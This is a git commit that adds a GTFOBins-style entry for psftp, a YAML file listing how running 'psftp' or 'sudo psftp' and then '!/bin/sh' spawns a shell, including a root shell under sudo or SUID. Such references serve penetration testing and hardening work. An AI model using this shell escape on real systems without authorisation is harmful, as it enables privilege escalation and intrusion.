Add psftp

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Miguel R
2022-02-19 13:38:24 +01:00
committed by GitHub
parent 71de637921
commit c32b82b5e9

15
_gtfobins/psftp.md Normal file
View File

@@ -0,0 +1,15 @@
---
functions:
shell:
- code: |
psftp
!/bin/sh
limited-suid:
- code: |
sudo psftp
!/bin/sh
sudo:
- code: |
sudo psftp
!/bin/sh
---